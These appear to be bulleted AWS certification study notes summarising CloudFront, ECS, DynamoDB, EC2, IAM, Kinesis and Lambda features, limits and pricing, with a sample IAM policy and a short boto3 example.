  • Original Identity Access (OAI)
    • A virtual user identity that will be used to give your CloudFront Distribution permission to fetch a private object
  • Inorder to use Signed URLs or Signed Cookies you need to have an OAI
  • Signed URLs
    • (Not the same thing as S3 Presigned URL)
      • A url with provides temporary access to cached objects
  • Signed Cookies
    • A cookie which is passed along with the request to CloudFront. The advantage of using a Cookie is you want to provide access to multiple restricted files. eg. Video Streaming

Caching Policy

  • Each object in the cache will be identified by a cache key
  • Maximize the cache-hit-ratio by minimizing requests to the origin
  • Cache Key
    • a unique identifier for everything in the cache
    • by default, made up of the hostname and resource portion of the URL
    • The cache key can be customized by creating a CloudFront Cache Policy

Caching Behaviors

  • Configure different settings for a given URL path pattern
  • Example: configure a specific behavior for requests to /images/*.jpg
  • Route to different kinds of origins/origin groups based on the content-type or path.
  • Examples:
    • /images/* to S3
    • /login to EC2
    • /api to API Gateway

Geo-Restriction

  • Restrict who can access your CloudFront distribution based on the country where the distribution was access from
  • You can create an AllowList or a BlockList

CloudFront Signed URL

  • Two types of signers:
    • Either a trusted key group (Recommended)
    • An AWS Account that contains a CloudFront Key Pair
  • In your distribution, create one or more trusted key groups

Pricing

  • You can reduce the number of edge locations for a cost savings
  • Price Classes
    • Price Class All: All regions, best performance
    • Price Class 200: most regions, but excludes the most expensive regions
    • Price Class 100: only the least expensive regions

Copilot

Introduction

  • CLI tool to build, release, and maintain production ready containerized apps
  • Helps you focus on building apps rather than setting up infrastructure
  • Automatically provisions all required infrastructure for a containerized app
  • Automate deployments using one command with CodePipeline
  • Deploy to ECS, Fargate, or App Runner

Elastic Container Registry

Introduction

  • Store container images in AWS, similar to DockerHub
  • Public or Private

Elastic Container Service

Introduction

IAM Roles for ECS

  • EC2 Instance Profile
    • Used by the ECS agent to make API calls to ECS Service, send container logs to CloudWatch, pull docker images from ECR, etc.
  • ECS Tasks:
    • Each ECS tasks gets a role. Applies to both EC2 and Fargate launch types
    • Task role is defined in the Task Definition

Load Balancer Integrations

  • ALB supports and works for most use cases
  • NLB is recommended only for high-throughput use cases

Data Volumes

  • Mount EFS file systems onto ECS Tasks
  • Works for both EC2 and Fargate Launch Types
  • Tasks running in any AZ will share the same data in the EFS file system
  • EFS + Fargate = serverless
  • S3 cannot be mounted on a file system in your ECS Tasks

ECS Service Auto-scaling

  • You can scale on 3 metrics
    • CPU
    • Memory
    • ALB Request Count
  • Types of Scaling:
    • Target Tracking: scale based on target value for a specific CloudWatch metric
    • Step Scaling: scale based on a specified CloudWatch Alarm
    • Scheduled Scaling: scale based on a specified date/time
  • Auto Scaling EC2 instances
    • Use an Auto Scaling Group
      • Scale based on CPU usage
    • ECS Cluster Capacity Provider
      • Used to automatically provision and scale the infrastructure of your ECS Tasks
      • Capacity Provider is paired with an auto-scaling group
      • Add EC2 instances when you are out of usable capacity (CPU, RAM, etc…)

ECS Rolling Updates

  • When updating versions of an ECS service, we can control how many tasks can be started and stopped, and in which order
  • Rolling Updates

ECS Tasks Definitions

  • Tasks definitions are metadata in JSON form to tell ECS how to run a container
  • How can we add environment variables to an ECS Task?
    • Hardcoded - URLs for example
    • SSM Parameter Store - sensitive variables such as API keys
    • Secrets Manager - Sensitive variables
  • Bind mounts
  • Essential Container -If enabled: If one container in the task fails or stops, all the other containers in the task will stop

ECS Task Placement

  • When a Task Definition for EC2 is created, ECS must determine where to schedule it

  • When a service scales in, ECS must determine which tasks to kill

  • To help with this, you can define a task placement strategy and task placement constraint

  • Task placement strategies and constraints only work on EC2 launch types

  • How does this work?

    • ECS will first determine where it is possible to place the task. Which nodes have enough resources?
    • ECS will then determine which EC2 instances satisfy the task placement constraints
    • ECS will then determine which EC2 instances satisfy the task placement strategy
    • ECS will then schedule the task
  • Task Placement Strategies

    • BinPack: Schedule tasks based on the least available amount of CPU or memory
      • i.e. pack as many containers as possible on a node before scheduling containers on other nodes
    • Random: Place the task randomly
    • Spread: Spread instances across nodes based on a specified value (AZ, instanceId, etc.)
  • Task Placement Constraints

    • distinctInstance: Each task should be placed on a separate EC2 instance
    • memberOf: Schedule tasks on instances that satisfy an expression written in cluster query language ()

Dynamodb

Introduction

  • Fully managed, highly available with replication across AZs
  • NoSQL Database
  • Scales to massive workloads, highly distributed database
  • Fully integrates with IAM
  • Enable event driven programming with DynamoDB streams

Basics

  • DynamoDB is made of tables
  • Each table will have primary key (must be decided at creation time)
  • Each table can have an infinite number of rows (rows are items)
    • Each row can have a max of 400KB of data

Primary keys

  • how to choose a primary key?
  • Two types of primary keys
    • partition keys
      • Partition key must be unique for each item
      • Partition key must be ‘diverse’ so that data is distributed
    • partition key + sort key
      • data is grouped by partition key
      • each combination must be unique per item

Read/Write Capacity Modes

  • Provisioned Mode
    • Provision all capacity in advance by providing values for RCU and WCU
    • Pay up front
    • Throughput can temporarily be exceeded using a burst capacity
    • If you exhaust the burst capacity, you can retry using exponential backoff
  • On-demand Mode
    • Reads/writes scale on-demand
    • Pay for what you use
  • You can switch between the two modes once every 24 hours

Local Secondary Index

  • Alternate sort key for your table
  • Must be defined at table creation time
  • Up to 5 local secondary indexes per table
  • The sort key consists of one scaler attribute (string, number, or binary)

Global Secondary Index

  • Alternative primary key from the base table

PartiQL

  • Use SQL-like syntax to query DynamoDB tables

Optimistic Locking

  • DynamoDB has a feature called “conditional writes” to ensure an item has not changed before writing to it
  • Each item has an attribute that acts as a version number
  • Useful for when you have multiple writers attempters to write to an item

DynamoDB Accelerator (DAX)

  • Fully managed, highly available, seamless in-memory cache for DynamoDB
  • Microseconds latency for cached reads and queries
  • Does not require that you change any application code
  • Solves the “hot key” problem. If you read a specific key (item) too many times, you may get throttled.
  • 5 minutes TTL for cache (default)
  • Up to 10 DAX nodes per cluster
  • Multi-AZ (3 nodes minimum recommended for production)
  • Secure (Encryption in transit and at rest)

DynamoDB Streams

  • Streams are an ordered item-level modifications (create/update/delete) in a table
  • Stream records can be:
    • Sent to Kinesis Data Streams
    • Read by AWS Lambda
    • Read by Kinesis Client Library Apps
  • Data retention for up to 24 hours
  • Use cases:
    • react to changes in real-time
    • Analytics
    • Insert into derivative tables
    • Insert into OpenSearch service

EC2

Table of Contents

Introduction

  • EC2 is Amazon’s Elastic Compute Cloud
  • It is comprised of virtual machines, storage, load balancers, auto scaling VMs
  • You can run Windows, Linux, or MacOS
  • You can choose how many vCPUs and how much RAM you want
  • You can choose how much storage space you want
  • You can choose what type of network card and whether or not you need a public IP (Elastic IP)
  • You can run a bootstrap script at launch time called “user data”. The script is only run once when the instance first starts.
  • You can configure firewall rules via a Security Group

Budgets

  • You can create a budget and alert to ensure you don’t go over a certain cost
  • You need to enable “IAM user and role access to Billing information” in your account settings

Instance Types

  • General Purpose
    • Balance between compute, memory, and networking
    • Great for diversity of workloads such as web servers or code repositories
  • Compute Optimized
    • Optimized for compute intensive tasks
    • Examples: Machine Learning, batch processing, HPC, etc.
  • Memory Optimized
    • Optimized for memory intensive tasks
    • High performance databases or caches
  • Storage Optimized
    • Example use cases: OLTP, databases, caches, etc.
  • Accelerated Computing
    • HPC

Example:

m5.2xlarge
| |   |
| |   +-- 2xlarge: size within instance class
| +------ 5: generation
+--------- m: instance class

Security Groups

  • Security groups are like a firewall scoped to the EC2 instance
  • Security groups only contain allow rules
  • Security groups are stateful
  • Security groups can have a source of IP/range or another security group
  • An instance can have multiple security groups attached
  • A security group can be attached to multiple instances
  • Security groups are region-locked

Ports to know for the exam

  • 21 = FTP
  • 22 = SSH/sFTP
  • 80 = HTTP
  • 443 = HTTPS
  • 3389 = RDP
  • 5432 - Postgresql
  • 3306 - MySQL / MariaDB
  • 1521 - Oracle
  • 1433 - MSSQL

EC2 Purchasing Options

  • On-Demand
    • Short workload, predictable pricing
    • Linux or Windows, billed per second. Other operation systems, billed per hour
  • Reserved
    • 1 to 3 years commitment
    • Used for long workloads
    • Up to a 72% discount compared to on-demand
    • Pay upfront, partially upfront, or no upfront
    • Scoped to a region or zone
    • You can buy or sell them in the Reserved Instances Marketplace
  • Savings Plan
    • Up to a 72% discounted compared to on-demand
    • Commit to a certain type of usage (example: $10/hour for 1 to 3 years). Usage beyond the commitment is billed at the on-demand price
    • Locked to a specific instance family and AWS region (example: M5 in us-east-1)
    • 1 to 3 years commitment
    • Commit to an amount of usage
  • Spot Instances
    • Short workloads, cheap, less reliable
    • The MOST cost efficient option
    • Workload must be resilient to failure
  • Dedicated Hosts
    • Reserve an entire physical server, control instance placement
    • Allows you to address compliance or license requirements
    • Purchasing Options:
      • On-demand
      • Reserved for 1 to 3 years
    • The most expensive option
  • Dedicated Instances
    • No other customers will share your hardware
    • You may share the hardware with other instances in the same account
    • No control over the instance placement
  • Capacity Reservation
    • Reserve capacity in a specific AZ for any duration
    • You always have access to the EC2 capacity when you need it
    • No time reservations
    • Combine with regional reserved instances or a savings plan for cost savings
    • Even if you don’t launch instances, you still get charged

EBS Volumes

  • AN EBS (Elastic Block Store) Volume is a network drive which you can attach to you instances while they run
  • EBS volumes are bound to a specific Availability Zone
    • To move an EBS volume to another AZ, you must first snapshot it and then copy the snapshot
  • EBS volumes have a provisioned capacity
    • You are billed for the provisioned capacity
  • IOPS typically scale with capacity (i.e. larger volumes have better performance)
  • EBS volumes have a “Delete on Termination” attribute. This is enabled for the root volume by default, but not for other volumes

EBS Volume Snapshots

  • To move an EBS volume to another AZ, you must first snapshot it and then copy the snapshot
  • EBS Snapshot Archive
    • Gives you the ability to move snapshots to the archive tier, which is up to 75% cheaper
    • Takes 24-72 hours to restore the snapshot
  • EBS Snapshot Recycle Bin
    • Allows you to restore deleted snapshot
    • Retention can be 1 day to 1 year
  • Fast Snapshot Restore
    • Force full initialization of snapshot to have to latency on first use
    • can be very expensive

AMI (AWS Machine Image)

  • VM Image

  • AMI’s are built for a specific region and can be copied to other regions

  • AMI Types:

    • Private
    • Public
    • MarketPlace
  • AMI Creation Process

    • Start instance and customize it
    • Stop the instance
    • Capture the AMI

EC2 Instance Store

  • Storage mounted in an EC2 instance that is local to the physical host
  • High performance
  • The storage is wiped when the EC2 instance stops or is terminated
  • Use cases: cache, temporary content, or scratch space

EBS Volume Types

  • GP2/GP3 - General SSD

    • 1 GB up to 16 TB
  • IO1/IO2 - High performance SSD

  • ST1 (hdd) - low cost HDD volume

  • SC1 (hdd) - Lowest cost HDD volume

  • Only GP2/3 and IO1/2 can be used as root (bootable) volumes

EBS Multi-attach

  • Attach the same EBS volume to multiple instances (up to 16) in the same AZ
  • Only available for IO1/IO2 family of EBS volumes
  • Each instance will have read/write access to the volume
  • You must use a file system that is cluster aware

EFS

  • Managed NFS (Network File System)

  • Pay per use

  • 3x more expensive than a GP2 EBS volume

  • Can be mounted on different EC2 instances in different Availability Zones

  • EFS Scale

    • 1000s of concurrent clients, 10 GB+ throughput
    • Grow to petabyte scale network file system, automatically
    • Performance Classes:
      • Performance Mode:
        • General purpose: latency sensitive use cases (web server, CMS, etc…)
        • Max I/O: higher latency, throughput, highly parallel (big data, media processing)
      • Throughput Mode:
        • Bursting: 1 TB= 50MB/s + burst up to 100MB/s
        • Provisioned - set your throughput regardless of storage size
        • Elastic - Automatically scales throughput up or down based on your workloads
    • Storage Classes:
      • Storage Tiers (move files to another tier after ‘x’ number of days)
        • Standard
        • Infrequent Access
        • Archive
      • Implement lifecycle policies to move files between tiers

Elastic Load Balancer (ELB)

  • Load balancers forward traffic to multiple backend servers

  • ELB is a managed load balancer

  • ELB is integrated with many offerings and services ()

  • ELB supports health checks to verify if a backend instance is working before forwarding traffic to it

  • Types of load balancers on AWS:

    • Application Load Balancer

      • Layer 7
        • Support HTTP2 and WebSockets
      • Supports HTTP redirects
      • Supports URL path routing, hostname routing, query string routing, header routing
      • Backend instances are grouped into a Target Group
      • You get a fixed hostname
      • The app servers don’t see the IP of the client directly
        • If the app servers need to know the client IP/port/protocol, they can check the following headers:
          • X-Forwarded-For
          • X-Forwarded-Proto
          • X-Forwarded-Port
    • Network Load Balancer

      • Layer 4
        • Supports UDP and TCP
      • High performance
      • One static IP per availability zone
    • Gateway Load Balancer

      • Layer 3
      • Used for 3rd party network appliances on AWS, example: Firewalls
      • Extremely high performance
      • Supports the GENEVE protocol
    • Target Groups

      • EC2 Instances
      • ECS Tasks
      • Lambda Functions
      • Private IP addresses
    • Sticky Sessions

      • Cookie Names

        • Application-based cookies
          • Custom Cookie
            • Generated by the target
            • Can include any custom attributes required by the application
            • Cookie name must be specified individually for each target group
            • You cannot use AWSALB, AWSALBAPP, or AWSALBTG (these are reserved by the ELB)
          • Application Cookie
            • Generated by the load balancer
            • Cookie name is AWSALBAPP
        • Duration-based Cookie
          • Cookie generated by the load balancer
          • Cookie name is AWSALB for ALB, AWSELB for CLB
    • Cross-zone load balancing

      • Each load balancer instance distributes traffic evenly across all registered instances in all availability zones

Autoscaling Groups

  • Scale out EC2 instances to match increased load or scale in to match a decreased load
  • Specify parameters to have a minimum and maximum number of instances
  • Automatically replace failed instances
  • Uses a launch template

IMDS

  • IMDSv1 vs. IMDSv2
    • IMDSv1 is accessing http://169.254.169.254/latest/meta-data directly
    • IMDSv2 is more secure and is done in two steps
      1. get a Session token
      2. Use session token in the IMDSv2 calls

Elasticache

Introduction

  • Fully managed Redis or Memcached instances
  • Caches are in-memory databases with high-performance and low latency
  • Helps to reduce load from databases
  • Helps to make your application stateless
  • Requires that your application be architected with a cache in-mind

Redis

  • Supports multi-AZ with auto-failover
  • Supports read-replicas to scale out reads
  • Backup and restore features
  • Supports sets and sorted sets

Memcached

  • Multi-node for partitioning of data (Sharding)
  • None of the features that Redis supports

Caching Implementation Considerations

  • Is it safe to cache the data?
    • Data may be out of date (eventually consistent)
  • Is caching effective for that data?
    • Patterns: data changing slowly, few keys are frequently updated
    • Anti patterns: data changing rapidly, all large key space frequently needed
  • Is data structured for caching?
    • example: key value caching or caching of aggregations result

Caching design patterns

Lazy Loading / Cache-Aside / Lazy Population

Write-through

Cache Evictions and TTL

  • Cache eviction can occur in 3 ways:
    • You delete the item in the cache
    • Item is evicted because the memory is full and its not in use (LRU)
    • The TTL (time to live) has expired
      • TTL can range from a few seconds to days

IAM

Table of Contents


Introduction

  • IAM is Identity and Access Management
  • IAM is a global service
  • Do not use the root account, create user accounts instead

Users and Groups

  • Groups can only contain users, not other groups
  • Users do not need to belong to a group. Users can belong to multiple groups

IAM Policies

  • Users and groups can be assigned a policy called an IAM policy. IAM policies are JSON documents:

        {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "EnableDisableHongKong",
                    "Effect": "Allow",
                    "Action": [
                        "account:EnableRegion",
                        "account:DisableRegion"
                    ],
                    "Resource": "*",
                    "Condition": {
                        "StringEquals": {"account:TargetRegion": "ap-east-1"}
                    }
                },
                {
                    "Sid": "ViewConsole",
                    "Effect": "Allow",
                    "Action": [
                        "account:ListRegions"
                    ],
                    "Resource": "*"
                }
            ]
        }
    
  • IAM policy inheritance

    • inline policies are attached directly to users
    • If an IAM policy is attached to a group, any users in that group will inherit settings from the policy

Password Policy

MFA (Multi-factor authentication)

  • Virtual MFA device
    • Google Authenticator
    • Authy
  • Universal 2nd Factor Security Key
    • Ubikey
  • Hardware Key Fob
    • Also has a special option for GovCloud

IAM Roles

  • Allows AWS service to perform actions on your behalf. When creating the role, you choose which service the role will apply to (For example, EC2)
  • Assign permissions to AWS services with IAM roles

IAM Security Tools

  • IAM Credentials Report
    • A report that lists all user accounts and status of their credentials
  • IAM Access Advisor
    • Access advisor shows the service permissions granted to a user and when those services were last accessed

Kinesis

Introduction

  • Kinesis is a set of services provided by AWS
    • Kinesis Data Streams: capture, process, and store data streams
    • Kinesis Data Firehose: load data streams into AWS data stores
    • Kinesis Data Analytics: analyze data streams with SQL or Apache Flink
    • Kinesis Video Streams: Capture, process and store video streams

Kinesis Data Firehose

  • Records up to 1 MB can be sent to Kinesis Data Firehose and Firehose will then batch writees to other resources in near real-time
  • Fully managed by AWS, autoscales
  • Pay only for the data going through Firehose
  • Producers such as (Applications, Kinesis Agent, Kinesis Data Streams, CloudWatch, AWS IoT) can write to Firehose, and Firehose will then send the data to S3, RedShift, or OpenSearch
  • Data Firehose can also send to 3rd parties such as Splunk, Datadog, etc.
  • You can transform data using Lambda functions before sending it to the destination

Kinesis Streams

Collect and process large streams of data in real-time.

Use Cases:

  • Fast (second/millisecond latency) processing of log events
  • Real-time metrics and reporting
  • Data analytics
  • Complex stream processing

Kinesis Libraries / Tools:

Producing Data:

  • Kinesis Producer Library (KPL)

    • Blog post: Implementing Efficient and Reliable Producers with the Amazon Kinesis Producer Library
    • Auto-retry configurable mechanism
    • Supports two complementary ways of batching:
      • Collection (of stream records):
        • Buffers/collects records to write multiple records to multiple shards in a single request.
        • RecordMaxBufferedTime: max time a record may be buffered before a request is sent. Larger = more throughput but higher latency.
      • Aggregation (of user records):
        • Combines multiple user records into a single Kinesis stream record (using PutRecords API request).
        • KCL integration (for deaggregating user records).
  • Kinesis Agent

    • Standalone application that you can install on the servers you’re interested in.
    • Features:
      • Monitors file patterns and sends new data records to delivery streams
      • Handles file rotation, checkpointing, and retry upon failure
      • Delivers all data in a reliable, timely, and simpler manner
      • Emits CloudWatch metrics for monitoring and troubleshooting
      • Allows preprocessing data, e.g., converting multi-line record to single line, converting from delimiter to JSON, converting from log to JSON.

Kinesis Streams API:

Reading Data:

  • Kinesis Client Library (KCL)
    • The KCL ensures there is a record processor running and processing each shard.
    • Uses a DynamoDB table to store control data. It creates one table per application that is processing data.
    • Creates a worker thread for each shard. Auto-assigns shards to workers (even workers on different EC2 instances).
    • KCL Checkpointing
      • Last processed record sequence number is stored in DynamoDB.
      • On worker failure, KCL restarts from last checkpointed record.
      • Supports deaggregation of records aggregated with KPL.
      • Note: KCL may be bottlenecked by DynamoDB table (throwing Provisioned Throughput Exceptions). Add more provisioned throughput to the DynamoDB table if needed.

Emitting Data:

  • Kinesis Connector Library (Java) for KCL
    • Connectors for: DynamoDB, Redshift, S3, Elasticsearch.
    • Java library with the following steps/interfaces:
      • iTransformer: maps from stream records to user-defined data model.
      • iFilter: removes irrelevant records.
      • iBuffer: buffers based on size limit and total byte count.
      • iEmitter: sends the data in the buffer to AWS services.
      • S3Emitter: writes buffer to a single file.

Kinesis Stream API:

  • PutRecord (single record per HTTP request)
  • PutRecords (multiple records per single HTTP request). Recommended for higher throughput.
    • Single record failure does not stop the processing of subsequent records.
    • Will return HTTP 200 as long as some records succeed (even when others failed).
    • Retry requires application code in the producer to examine the PutRecordsResult object and retry whichever records failed.

Key Concepts

Kinesis Data Streams:

  • Stream big data into AWS

  • Kinesis Data Streams

  • A stream is a set of shards. Each shard is a sequence of data records.

    • Shards are numbered (shard1, shard2, etc.)
  • Each data record has a sequence number that is assigned automatically by the stream.

  • A data record has 3 parts:

    • Sequence number
    • Partition key
    • Data blob (immutable sequence of bytes, up to 1000KB).
  • Sequence number is only unique within its shard.

  • Retention Period:

    • Retention for messages within a Data Stream can be set to 1 - 365 days
    • You pay more for longer retention periods.
  • Consumers and Producers

    • producers send data (records) into data streams
      • records consist of a partition key and a data blob
      • producers can send 1MB/sec or 1000 msg/sec per shard
    • Consumers receive data from data streams
      • consumers can be apps, lambda functions, Kinesis Data Firehose, or Kinesis Data Analytics
      • Consumers can receive messages at 2 MB/sec (shared version, across all consumers) per shard or 2 MB/sec (enhanced version) per consumer per shard
  • Once data is inserted into Kinesis, it cannot be deleted

  • Capacity Modes:

    • Provisioned Mode
      • Choose the number of shards provisioner
      • Scale manually
      • Each shard gets 1 MB/s in and 2 MB/s out
      • Pay per shard provisioned per hour
    • On-demand Mode:
      • No need to provision or manage capacity
      • Auto-scaling
      • Pay per stream per hour and data in/out per GB
  • Access control to Data Streams using IAM policies

  • Encryption in flight with HTTPS and at rest with KMS

  • Kinesis Data Streams support VPC Endpoints

  • Monitor API calls using CloudTrail

Kinesis Application Name:

  • Each application must have a unique name per (AWS account, region). The name is used to identify the DynamoDB and the namespace for CloudWatch metrics.

Partition Keys:

  • Used to group data by shard within a stream. It must be present when writing to the stream.
  • When writing to a stream, Kinesis separates data records into multiple shards based on each record’s partition key.
  • Partition keys are Unicode strings with a maximum length of 256 bytes. An MD5 hash function is used to map partition keys to 128-bit integer values that define which shard records will end up in.

Kinesis Shard:

  • Uniquely identified group of data records in a stream.
  • Multiple shards in a stream are possible.
  • Single shard capacity:
    • Write: 1 MB/sec input, 1000 writes/sec.
    • Read: 2 MB/sec output, 5 transaction reads/sec.
  • Resharding:
    • Shard split: divide a shard into two shards.
      • Example using boto3:
        sinfo = kinesis.describe_stream("BotoDemo")
        hkey = int(sinfo["StreamDescription"]["Shards"][0]["HashKeyRange"]["EndingHashKey"])
        shard_id = 'shardId-000000000000'  # we only have one shard!
        kinesis.split_shard("BotoDemo", shard_id, str((hkey+0)/2))
        
    • Shard merge: merge two shards into one.

Kinesis Server-Side Encryption:

  • Can automatically encrypt data written, using KMS master keys. Both producer and consumer must have permission to access the master key.
  • Add kms:GenerateDataKey to producer’s role.
  • Add kms:Decrypt to consumer’s role.

Kinesis Firehose:

  • Managed service for loading data from streams directly into S3, Redshift, and Elasticsearch.
  • Fully managed: scalability, sharding, and monitoring with zero admin.
  • Secure.
  • Methods to Load Data:
    • Use Kinesis Agent.
    • Use AWS SDK.
    • PutRecord and PutRecordBatch.
    • Firehose to S3:
      • Buffering of data before sending to S3. Sends whenever any of these conditions is met:
        • Buffer size (from 1 MB to 128 MB).
        • Buffer interval (from 60s to 900s).
      • Can invoke AWS Lambda for data transformation.
        • Data flow:
          1. Buffers incoming data up to 3 MB or buffering size specified, whichever is lowest.
          2. Firehose invokes Lambda function.
          3. Transformed data is sent from Lambda to Firehose for buffering.
          4. Transformed data is delivered to the destination.
        • Response from Lambda must include:
          • recordId: must be the same as prior to transformation.
          • result: status, one of: “Ok”, “Dropped”, “ProcessingFailed”.
          • data: Transformed data payload.
        • Failure handling of data transformation:
          • 3 retries.
          • Invocation errors logged in CloudWatch Logs.
          • Unsuccessful records are stored in processing_failed folder in S3.
          • It’s possible to store the source records in S3, prior to transformation (Backup S3 bucket).
  • Data Delivery Speed:
    • S3: based on buffer size/buffer interval.
    • Redshift: depending on how fast the Redshift cluster finishes the COPY command.
    • Elasticsearch: depends on buffer size (1-100 MB) and buffer interval.
  • Firehose Failure Handling:
    • S3: retries for up to 24 hrs.
    • Redshift: retry duration from 0-7200 sec (2 hrs) from S3.
      • Skips S3 objects on failure.
      • Writes failed objects in manifest file, which can be used manually to recover lost data (manual backfill).
    • ElasticSearch: retry duration 0-7200 sec.
      • On failure, skips index request and stores in index_failed folder in S3.
      • Manual backfill.

AWS Kinesis Overview:

  • Enables real-time processing of streaming data at massive scale.
  • Kinesis Streams:
    • Enables building custom applications that process or analyze streaming data for specialized needs.
    • Handles provisioning, deployment, ongoing-maintenance of hardware, software, or other services for the data streams.
    • Manages the infrastructure, storage, networking, and configuration needed to stream the data at the required data throughput level.
    • Synchronously replicates data across three facilities in an AWS Region, providing high availability and data durability.
    • Stores records of a stream for up to 24 hours, by default, from the time they are added to the stream. The limit can be raised to up to 7 days by enabling extended data retention.
    • Data such as clickstreams, application logs, social media, etc., can be added from multiple sources and within seconds is available for processing to the Amazon Kinesis Applications.
    • Provides ordering of records, as well as the ability to read and/or replay records in the same order to multiple Kinesis applications.
    • Useful for rapidly moving data off data producers and then continuously processing the data, whether it is to transform the data before emitting to a data store, run real-time metrics and analytics, or derive more complex data streams for further processing.

Use Cases:

  • Accelerated log and data feed intake: Data producers can push data to Kinesis stream as soon as it is produced, preventing any data loss and making it available for processing within seconds.
  • Real-time metrics and reporting: Metrics can be extracted and used to generate reports from data in real-time.
  • Real-time data analytics: Run real-time streaming data analytics.
  • Complex stream processing: Create Directed Acyclic Graphs (DAGs) of Kinesis Applications and data streams, with Kinesis applications adding to another Amazon Kinesis stream for further processing, enabling successive stages of stream processing.

Kinesis Limits:

  • Stores records of a stream for up to 24 hours, by default, which can be extended to max 7 days.
  • Maximum size of a data blob (the data payload before Base64-encoding) within one record is 1 megabyte (MB).
  • Each shard can support up to 1000 PUT records per second.
  • Each account can provision 10 shards per region, which can be increased further through request.
  • Amazon Kinesis is designed to process streaming big data and the pricing model allows heavy PUTs rate.
  • Amazon S3 is a cost-effective way to store your data but not designed to handle a stream of data in real-time.

Kinesis Streams Components:

Shard:

  • Streams are made of shards and is the base throughput unit of a Kinesis stream.
  • Each shard provides a capacity of 1MB/sec data input and 2MB/sec data output.
  • Each shard can support up to 1000 PUT records per second.
  • All data is stored for 24 hours.
  • Replay data inside a 24-hour window.
  • Capacity Limits: If the limits are exceeded, either by data throughput or the number of PUT records, the put data call will be rejected with a ProvisionedThroughputExceeded exception.
    • This can be handled by:
      • Implementing a retry on the data producer side, if this is due to a temporary rise of the stream’s input data rate.
      • Dynamically scaling the number of shared (resharding) to provide enough capacity for the put data calls to consistently succeed.

Record:

  • A record is the unit of data stored in an Amazon Kinesis stream.
  • A record is composed of a sequence number, partition key, and data blob.
    • Data blob is the data of interest your data producer adds to a stream.
    • Maximum size of a data blob (the data payload before Base64-encoding) is 1 MB.

Partition Key:

  • Used to segregate and route records to different shards of a stream.
  • Specified by your data producer while adding data to an Amazon Kinesis stream.

Sequence Number:

  • A unique identifier for each record.
  • Assigned by Amazon Kinesis when a data producer calls PutRecord or PutRecords operation to add data to an Amazon Kinesis stream.
  • Sequence numbers for the same partition key generally increase over time; the longer the time period between PutRecord or PutRecords requests, the larger the sequence numbers become.

Data Producers:

  • Data can be added to an Amazon Kinesis stream via PutRecord and PutRecords operations, Kinesis Producer Library (KPL), or Kinesis Agent.

Amazon Kinesis Agent:

  • A pre-built Java application that offers an easy way to collect and send data to Amazon Kinesis stream.
  • Can be installed on Linux-based server environments such as web servers, log servers, and database servers.
  • Configured to monitor certain files on the disk and then continuously send new data to the Amazon Kinesis stream.

Amazon Kinesis Producer Library (KPL):

  • An easy to use and highly configurable library that helps you put data into an Amazon Kinesis stream.
  • Presents a simple, asynchronous, and reliable interface that enables you to quickly achieve high producer throughput with minimal client resources.

Amazon Kinesis Application:

  • A data consumer that reads and processes data from an Amazon Kinesis stream.
  • Can be built using either Amazon Kinesis API or Amazon Kinesis Client Library (KCL).

Amazon Kinesis Client Library (KCL):

  • A pre-built library with multiple language support.
  • Delivers all records for a given partition key to the same record processor.
  • Makes it easier to build multiple applications reading from the same Kinesis stream (e.g., to perform counting, aggregation, and filtering).
  • Handles complex issues such as adapting to changes in stream volume, load-balancing streaming data, coordinating distributed services, and processing data with fault-tolerance.

Amazon Kinesis Connector Library:

  • A pre-built library that helps you easily integrate Amazon Kinesis Streams with other AWS services and third-party tools.
  • Kinesis Client Library is required for Kinesis Connector Library.

Amazon Kinesis Storm Spout:

  • A pre-built library that helps you easily integrate Amazon Kinesis Streams with Apache Storm.

Kinesis vs SQS:

  • Kinesis Streams enables real-time processing of streaming big data while SQS offers a reliable, highly scalable hosted queue for storing messages and moving data between distributed application components.
  • Kinesis provides ordering of records, as well as the ability to read and/or replay records in the same order to multiple Amazon Kinesis Applications, while SQS does not guarantee data ordering and provides at least once delivery of messages.
  • Kinesis stores the data up to 24 hours, by default, and can be extended to 7 days, while SQS stores the message up to 4 days, by default, and can be configured from 1 minute to 14 days but clears the message once deleted by the consumer.
  • Kinesis and SQS both guarantee at-least-once delivery of messages.
  • Kinesis supports multiple consumers, while SQS allows the messages to be delivered to only one consumer at a time and requires multiple queues to deliver messages to multiple consumers.

Kinesis Use Case Requirements:

  • Ordering of records.
  • Ability to consume records in the same order a few hours later.
  • Ability for multiple applications to consume the same stream concurrently.
  • Routing related records to the same record processor (as in streaming MapReduce).

SQS Use Case Requirements:

  • Messaging semantics like message-level ack/fail and visibility timeout.
  • Leveraging SQS’s ability to scale transparently.
  • Dynamically increasing concurrency/throughput at read time.
  • Individual message delay, which can be delayed.

Lambda

Introduction

  • Serverless, virtual functions
  • Short executions up to 15 minutes
  • Run on-demand
  • Pay for number of invocations and compute time
  • Works with many programming languages
    • Node.js, python, Java, c#, Go, Powershell, Ruby, and Custom Runtime API (which can run practically any language)
  • You can provision up to 10GB of RAM per function

Lambda Integrations

  • API Gateway
  • Kinesis
  • DynamoDB
  • S3
  • CloudFront
  • CloudWatch Events / EventBridge
  • CloudWatch Logs
  • SNS
  • SQS
  • Cognito

Pricing

  • Pay per call:
    • First 1,000,000 requests are free
    • .20 per 1 million requests after the first million
  • Pay per duration
    • 400,000 GB-seconds of compute time per month for free

Synchronous Invocation

  • When invoking the function from the CLI, SDK, API Gateway, or ALB, the call is synchronous, meaning the result is returned right away
  • Error handling must happen on the client side (retires, exponential backoff, etc.)

Asynchronous Invocation

  • S3, SNS, CloudWatch Events are all processed asynchronously
  • The events are placed in an internal event queue
  • The lambda function will read from the event queue and attempt to process the events
  • Lambda will attempt to retry failures up to 3 times
    • This means that event may be processed multiple times, so make sure the lambda function is idempotent
    • If the function is retried, you will see duplicate entries in CloudWatch Logs
    • You can define a DLQ (dead-letter queue) (SNS or SQS) for failed processing
  • Async invocations allow you to speed up the processing if you don’t need to wait for the result

S3 Event Notifications

  • Run a Lambda function when a event in S3 is detected

Lambda Event Source Mapping

  • Lambda will poll from the sources and be invoked synchronously
    • Kinesis Data Streams
    • SQS or SQS FIFO
    • DynamoDB Streams
  • Two categories of Event Source Mapping:
    • Streams
      • Kinesis or DynamoDB Streams
      • One Lambda invokation per stream shard
      • If you use parallelization, up to 10 batches processed per shard simultaneously
    • Queues
      • Poll SQS using Long Polling

Lambda in VPC

  • By default, Lambda functions are launched outside of your VPC. Therefore, it cannot access resources in your VPC.
  • Lambda can create an Elastic Network Interface inside your VPC
    • You must define the VPC ID, subnets, and security groups
    • Lambda requires the AWSLambdaVPCAccessExecutionRole
  • By default, a Lambda function in your VPC does not have internet access
